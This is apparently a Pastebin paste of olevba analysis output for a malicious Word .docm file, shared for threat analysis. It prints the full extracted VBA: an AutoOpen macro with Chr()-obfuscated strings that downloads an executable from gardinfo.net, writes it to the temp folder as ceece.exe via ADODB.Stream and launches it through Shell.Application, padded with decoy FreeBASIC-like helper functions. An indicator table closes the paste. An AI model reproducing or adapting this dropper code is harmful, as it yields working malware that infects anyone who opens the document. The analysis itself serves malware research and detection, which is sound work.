dynamoo

Malicious Word macro

Aug 10th, 2015
694
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIH--V malware.docm
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.docm
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. FBFILE_FORMAT_1
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34. '':::::
  35. Static Function _
  36.  hFBrelop2IRrelop _
  37.   (ByVal tk As _
  38.  Integer) As Integer
  39.  
  40.  Dim op As Integer
  41.  
  42.     Select Case tk
  43.     Case FB_TK_EQ
  44.      op = AST_OP_EQ
  45.     Case FB_TK_GT
  46.      op = AST_OP_GT
  47.     Case FB_TK_LT
  48.      op = AST_OP_LT
  49.     Case FB_TK_NE
  50.      op = AST_OP_NE
  51.     Case FB_TK_LE
  52.      op = AST_OP_LE
  53.     Case FB_TK_GE
  54.      op = AST_OP_GE
  55.  Case Else
  56.   dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
  57.   '' error recovery: fake an op
  58.  op = AST_OP_EQ
  59.     End Select
  60.  
  61.  
  62. End Function
  63.  
  64. Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
  65. pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
  66. End Sub
  67. '':::::
  68. Static Function _
  69.  hFileExists _
  70.   (ByVal filename As _
  71.  String) As Integer
  72.     Dim f As Integer
  73.  
  74.     f = FreeFile
  75.  
  76.   Close #f
  77.  
  78. End Function
  79.  
  80. '':::::
  81. Static Sub _
  82.  hUcase _
  83.   (ByVal src As String _
  84.   , ByVal dst As _
  85.  String)
  86.  
  87.     Dim c As Integer
  88.     Dim s
  89.     Dim d
  90.  
  91.  s = src
  92.  d = dst
  93.  
  94.  Do
  95.   c = s
  96.   If (c >= 97) Then
  97.    If (c <= 122) Then
  98.     c = c - (97 - 65)
  99.    End If
  100.   ElseIf (c = 0) Then
  101.    Exit Do
  102.   End If
  103.  
  104.   d = c
  105.  
  106.   s = s + 1
  107.   d = d + 1
  108.  Loop
  109.  
  110.  '' null-term
  111. d = 0
  112.  
  113. End Sub
  114.  
  115. '':::::
  116. Static Sub _
  117.  hClearName _
  118.   (ByVal src As String)
  119.  
  120.     Dim p
  121.  
  122.  p = src
  123.  
  124.  Do
  125.   Select Case p
  126.   Case 0
  127.    Exit Do
  128.  
  129.   Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
  130.  
  131.   Case Else
  132.    p = CHAR_ZLOW
  133.   End Select
  134.  
  135.   p = p + 1
  136.  Loop
  137.  
  138. End Sub
  139.  
  140. Public Function usZ5pw3gU8(KJB As Long)
  141.  
  142. Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
  143. httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & "g" & "a" & Chr(114) & Chr(100) & Chr(105) & Chr(110) & Chr(102) & Chr(111) & "." & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(52) & "3" & Chr(53) & Chr(114) & Chr(103) & Chr(52) & Chr(47) & Chr(51) & Chr(50) & Chr(52) & Chr(53) & Chr(114) & Chr(100) & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
  144. httpRequest.Send
  145. usZ5pw3gU8 = httpRequest.responseBody
  146. End Function
  147. '' Searches backwards for the last '.' while still behind '/' or '\'.
  148. Private Function hFindExtBegin(ByRef path As String) As Integer
  149.  for i as integer = len( path )-1 to 0 step -1
  150.   select case( path[i] )
  151.   Case Asc(".")
  152.    return i
  153. #If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
  154. Case Asc("\"), Asc("/")
  155. #Else
  156.   Case Asc("/")
  157. #End If
  158.    Exit For
  159.   End Select
  160.  Next
  161.  function = len( path )
  162. End Function
  163.  
  164. Function hStripExt(ByRef path As String) As String
  165.  function = left( path, hFindExtBegin( path ) )
  166. End Function
  167.  
  168. '':::::
  169. function hStripPath _
  170.  ( _
  171.   byval filename as zstring ptr _
  172.  ) as string static
  173.  
  174.     dim as integer lp, p_found, p(1 to 2)
  175.  
  176.  lp = 0
  177.  Do
  178.   p(1) = instr( lp+1, *filename, RSLASH )
  179.   p(2) = instr( lp+1, *filename, "/" )
  180.         If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
  181.             p_found = p(2)
  182.         Else
  183.             p_found = p(1)
  184.         End If
  185.      If (p_found = 0) Then
  186.       Exit Do
  187.      End If
  188.      lp = p_found
  189.  Loop
  190.  
  191.  If (lp > 0) Then
  192.   function = mid( *filename, lp+1 )
  193.  Else
  194.   function = *filename
  195.  End If
  196.  
  197. End Function
  198. -------------------------------------------------------------------------------
  199. VBA MACRO Module1.bas
  200. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  201. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  202. Public Function hHexUInt _
  203.  ( _
  204.   ByVal value As uinteger _
  205.  ) As String
  206.  
  207.     static as zstring * 8 + 1 res
  208.     dim as zstring ptr p
  209.     dim as integer lgt, maxlen
  210.  
  211.  static as integer hexTB(0 to 15) = _
  212.  { _
  213.   asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
  214.   asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
  215.   asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
  216.   asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
  217.  }
  218.  
  219.  maxlen = 4
  220.  If (value > 65535) Then
  221.   maxlen = 8
  222.  End If
  223.  
  224.  p = @res + 8-1
  225.  lgt = 0
  226.  
  227.  Do
  228.   *p = hexTB( value and &h0000000F )
  229.  
  230.   lgt +=1
  231.   If (lgt = maxlen) Then
  232.    Exit Do
  233.   End If
  234.  
  235.   p -= 1
  236.   value shr = 4
  237.  Loop
  238.  
  239.  function = p
  240.  
  241. End Function
  242.  
  243. Function hFloatToHex _
  244.  ( _
  245.   ByVal value As Double, _
  246.   ByVal dtype As Integer _
  247.  ) As String
  248.  
  249.  '' Emit the raw bytes that make up the float
  250. '' x86 little-endian assumption
  251. If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
  252.   function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
  253.  Else
  254.   dim as single singlevalue = value
  255.   '' Using an intermediate uinteger to allow compiling with FB
  256.  '' versions before the overload resolution overhaul
  257.  function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
  258.  End If
  259. End Function
  260.  
  261. Function hFloatToHex_C99 _
  262.  ( _
  263.   ByVal value As Double _
  264.  ) As String
  265.  
  266.  '' float hex format defined in C99 spec: e.g. 0x1.fp+3
  267.  
  268.  dim as ulongint n = *cptr( ulongint ptr, @value )
  269.  
  270.  dim as integer sign = n shr 63
  271.  dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
  272.  dim as ulongint mantissa = n and (1ull shl 52 - 1)
  273.  
  274.  dim as string ret
  275.  
  276.  If (Sign <> 0) Then
  277.   '' negative
  278.  ret = "-0x"
  279.  Else
  280.   '' positive
  281.  ret = "0x"
  282.  End If
  283.  
  284.  exp2 -= 1023
  285.  If (exp2 > -1023) Then
  286.   '' normalized
  287.  ret += "1." + hex( mantissa, 13 )
  288.   If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
  289.  Else
  290.   If mantissa = 0 Then
  291.    '' zero
  292.   ret += "0"
  293.    exp2 = 0
  294.   Else
  295.    '' denormed
  296.   exp2 += 1
  297.    ret += "0." + hex( mantissa, 13  )
  298.    If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
  299.   End If
  300.  End If
  301.  
  302.  ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
  303.  
  304.  return ret
  305.  
  306. End Function
  307.  
  308.  
  309. -------------------------------------------------------------------------------
  310. VBA MACRO Module3.bas
  311. in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
  312. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  313.  
  314. '':::::
  315. Function hStripFilename _
  316.  ( _
  317.   ByVal filename As String _
  318.  ) As String
  319.  
  320.     dim as integer lp, p_found, p(1 to 2)
  321.  
  322.  lp = 0
  323.  Do
  324.   p(1) = instr( lp+1, *filename, RSLASH )
  325.   p(2) = instr( lp+1, *filename, "/" )
  326.         If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
  327.             p_found = p(2)
  328.         Else
  329.             p_found = p(1)
  330.         End If
  331.      If (p_found = 0) Then
  332.       Exit Do
  333.      End If
  334.      lp = p_found
  335.  Loop
  336.  
  337.  If (lp > 0) Then
  338.   function = left( *filename, lp )
  339.  Else
  340.   function = ""
  341.  End If
  342.  
  343. End Function
  344.  
  345. '':::::
  346. function hGetFileExt _
  347.  ( _
  348.   byval fname as zstring ptr _
  349.  ) as string static
  350.  
  351.     dim as integer p, lp
  352.     dim as string res
  353.  
  354.  lp = 0
  355.  Do
  356.   p = instr( lp+1, *fname, "." )
  357.   If (p = 0) Then
  358.    Exit Do
  359.   End If
  360.   lp = p
  361.  Loop
  362.  
  363.     If (lp = 0) Then
  364.      function = ""
  365.     Else
  366.      res = lcase( mid( *fname, lp+1 ) )
  367.         If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
  368.             '' We had a folder with a "." inside ...
  369.            function = ""
  370.         ElseIf (Len(res) > 0) Then
  371.       '' . or .. dirs?
  372.      if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
  373.        function = ""
  374.       Else
  375.        function = res
  376.       End If
  377.         End If
  378.     End If
  379.  
  380. End Function
  381.  
  382. sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
  383.  for i as integer = 0 to len( *s ) - 1
  384.   if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
  385.    s [i] = Char
  386.   End If
  387.  Next
  388. End Function
  389.  
  390. Function pathStripDiv(ByRef path As String) As String
  391.  dim as integer length = len( path )
  392.  If (length > 0) Then
  393.   length -= 1
  394.   select case( path[length] )
  395. #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
  396.   Case Asc("/"), Asc("\")
  397. #Else
  398.   Case Asc("/")
  399. #End If
  400.    return left( path, length )
  401.   End Select
  402.  End If
  403.  function = path
  404. End Function
  405.  
  406. Public Function hCurDir_2(UIlhbjkhoiyH As String)
  407. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
  408. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
  409. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
  410.  Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
  411. End Function
  412. Function pathIsAbsolute(ByVal path As String) As Integer
  413. #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
  414.  if( (*path)[0] <> 0 ) then
  415.   select case( (*path)[1] )
  416.   Case Asc(":")
  417.    '' C:...
  418.   function = TRUE
  419. #If def__FB_WIN32__ Then
  420.   Case Asc("\")
  421.    '' \\... UNC path
  422.   function = ((*path)[0] = asc( "\" ))
  423. #End If
  424.   End Select
  425.  End If
  426. #Else
  427.  '' /...
  428. function = ((*path)[0] = asc( "/" ))
  429. #End If
  430. End Function
  431.  
  432. Public Function FBFILE_FORMAT_1()
  433. Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  434. pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
  435. Dim pathIsAbsolute_4 As Object
  436. Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  437. Dim pathIsAbsolute_3 As String
  438. pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
  439. With pathIsAbsolute_4
  440.    .Type = 1
  441.     .Open
  442.     .write usZ5pw3gU8(223)
  443.    
  444. End With
  445.  
  446.  mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
  447. Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  448. noextensionFile.Open (pathIsAbsolute_3)
  449. End Function
  450. Function hCheckFileFormat(ByVal f As Integer) As Integer
  451.  dim as long BOM
  452.     dim as FBFILE_FORMAT fmt
  453.  
  454.  '' little-endian assumptions
  455. fmt = FBFILE_FORMAT_ASCII
  456.  
  457.  if( get( #f, 0, BOM ) = 0 ) then
  458.   If (BOM = &HFFFE0000) Then
  459.    fmt = FBFILE_FORMAT_UTF32BE
  460.  
  461.   ElseIf (BOM = &HFEFF) Then
  462.       fmt = FBFILE_FORMAT_UTF32LE
  463.  
  464.   Else
  465.    BOM and= &h00FFFFFF
  466.    If (BOM = &HBFBBEF) Then
  467.     fmt = FBFILE_FORMAT_UTF8
  468.  
  469.    Else
  470.     BOM and= &h0000FFFF
  471.           If (BOM = &HFEFF) Then
  472.            fmt = FBFILE_FORMAT_UTF16LE
  473.  
  474.           ElseIf (BOM = &HFFFE) Then
  475.            fmt = FBFILE_FORMAT_UTF16BE
  476.           End If
  477.    End If
  478.   End If
  479.  
  480.   Select Case fmt
  481.   Case FBFILE_FORMAT_ASCII
  482.    Seek #f, 1
  483.  
  484.   Case FBFILE_FORMAT_UTF8
  485.    Seek #f, 1 + 3
  486.  
  487.   Case FBFILE_FORMAT_UTF16LE, _
  488.     FBFILE_FORMAT_UTF16BE
  489.    Seek #f, 1 + 2
  490.   End Select
  491.  End If
  492.  
  493.  function = fmt
  494. End Function
  495.  
  496. Function hCurDir() As String
  497.  '' curdir() usually won't be terminated with a path separator,
  498. '' except when it points to the file system root, instead of
  499. '' some directory (e.g. C:\ on Win32 or / on Unix).
  500. function = pathStripDiv( curdir( ) )
  501. End Function
  502.  
  503. Function pathStripCurdir(ByRef path As String) As String
  504.  var pwd = hCurDir() + FB_HOST_PATHDIV
  505.  If (Left(path, Len(pwd)) = pwd) Then
  506.   function = right( path, len( path ) - len( pwd ) )
  507.  Else
  508.   function = path
  509.  End If
  510. End Function
  511.  
  512. function hIsValidSymbolName( byval sym as zstring ptr ) as integer
  513.  
  514.  If (sym = Null) Then Exit Function
  515.  
  516.  var symlen = len( *sym )
  517.  
  518.  If (symlen = 0) Then Exit Function
  519.  
  520.  if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
  521.  
  522.  for i as integer = 1 to symlen-1
  523.   if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
  524.  Next
  525.  
  526.  function = TRUE
  527.  
  528. End Function
  529.  
  530. '' Checks whether a string starts with and ends in [double-]quotes.
  531. Private Function strIsQuoted(ByRef s As String) As Integer
  532.  dim as integer last = len(s) - 1
  533.  If (Last < 1) Then
  534.   return FALSE
  535.  End If
  536.  
  537.  return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
  538.          ((s[0] = asc("'" )) and (s[last] = asc("'" ))))
  539. End Function
  540.  
  541. Function strUnquote(ByRef s As String) As String
  542.  If (strIsQuoted(s)) Then
  543.   return mid(s, 2, len(s) - 2)
  544.  End If
  545.  return s
  546. End Function
  547.  
  548. +------------+----------------------+-----------------------------------------+
  549. | Type       | Keyword              | Description                             |
  550. +------------+----------------------+-----------------------------------------+
  551. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  552. | Suspicious | Open                 | May open a file                         |
  553. | Suspicious | CreateObject         | May create an OLE object                |
  554. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  555. |            |                      | strings                                 |
  556. | Suspicious | SaveToFile           | May create a text file                  |
  557. | Suspicious | Write                | May write to a file (if combined with   |
  558. |            |                      | Open)                                   |
  559. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  560. |            |                      | be used to obfuscate strings (option    |
  561. |            |                      | --decode to see all)                    |
  562. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  563. |            | Strings              | may be used to obfuscate strings        |
  564. |            |                      | (option --decode to see all)            |
  565. | IOC        | http://gardinfo.net/ | URL (obfuscation: VBA expression)       |
  566. |            | 435rg4/3245rd2.exe   |                                         |
  567. | IOC        | 3245rd2.exe          | Executable file name (obfuscation: VBA  |
  568. |            |                      | expression)                             |
  569. | IOC        | ceece.exe            | Executable file name (obfuscation: VBA  |
  570. |            |                      | expression)                             |
  571. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment